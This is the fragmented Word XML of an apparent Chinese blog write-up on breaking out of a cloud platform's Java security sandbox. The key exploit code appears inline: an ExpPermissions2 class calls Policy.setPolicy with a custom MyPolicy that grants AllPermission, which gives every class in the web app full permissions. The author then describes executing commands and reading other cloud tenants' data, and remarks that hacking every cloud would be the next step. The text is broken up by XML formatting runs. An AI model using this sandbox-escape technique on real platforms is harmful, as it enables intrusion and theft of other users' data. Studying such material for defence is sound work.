      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>创建类，并且请求超级权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的流程。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExpPermissions2</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>类中，设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，如果没有先给</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExpPermissions2</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>类请求超级权限，就无法</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setPolicy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，爆权限异常。</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提权代码</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我们看看</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExpPermissions2</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的代码</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="91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95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidTr="00564D2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9195"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ExpPermissions2</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AccessController</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doPrivileged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this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Object</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> run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throws</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Exception</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cmdresult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00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"start exppermission"</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ProtectionDomain</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> domain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this</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getClass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getProtectionDomain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Policy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setPolicy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MyPolicy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PermissionCollection</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> pcoll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Policy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getPolicy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getPermissions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domain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cmdresult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00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"policyfile:"</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3399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Policy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getPolicy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toString</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0000FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000099"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>\r\n</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="0000FF"/>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Enumeration</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> enum1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pcoll.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>elements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for</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enum1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>hasMoreElements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w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> p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3399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Permission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enum1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>nextElement</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cmdresult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p.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>getName</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0000FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"|</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000099"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>\r\n</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="0000FF"/>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p>
        </w:tc>
      </w:tr>
    </w:tbl>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重点代码在：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="91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95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidTr="00564D2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9195"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003399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Policy</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>setPolicy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MyPolicy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tc>
      </w:tr>
    </w:tbl>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设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>为我们自己实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mypolicy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>重点代码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="91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95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidTr="00564D2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>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MyPolicy</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p </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="339933"/>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p.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>add</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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</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AllPermission</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public</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="003399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>PermissionCollection</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> getPermissions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003399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ProtectionDomain</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> cs</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="009900"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>)</w:t>
            </w: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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> p</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="339933"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidRDefault="00564D2E" w:rsidP="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555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="009900"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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一旦设置了这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>应用下所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>就会拥有所有权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>之后就是命令执行等等想干什么就干什么了，相关命令执行代码，就不贴出来了，看我前一篇文章，就能看到。</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>我们看看突破权限后，再次显示所有权限，可以看到只有这两个了</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noProof/>
          <w:color w:val="4A630F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5162550" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="http://www.inbreak.net/wp-content/uploads/2012/07/image0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break.net/wp-content/uploads/2012/07/image00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447800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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现在拥有了所有权限。</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t>执行命令</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然后执行命令：</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noProof/>
          <w:color w:val="4A630F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5619750" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://www.inbreak.net/wp-content/uploads/2012/07/image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break.net/wp-content/uploads/2012/07/image00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504950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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可以读取其他云上用户的数据，我们读个首页看看：</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noProof/>
          <w:color w:val="4A630F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://www.inbreak.net/wp-content/uploads/2012/07/image00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break.net/wp-content/uploads/2012/07/image00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676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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进一步，就是黑掉所有的云了，这个就不玩了</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidRDefault="00564D2E" w:rsidP="00564D2E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>总结：</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本次</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，是利用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
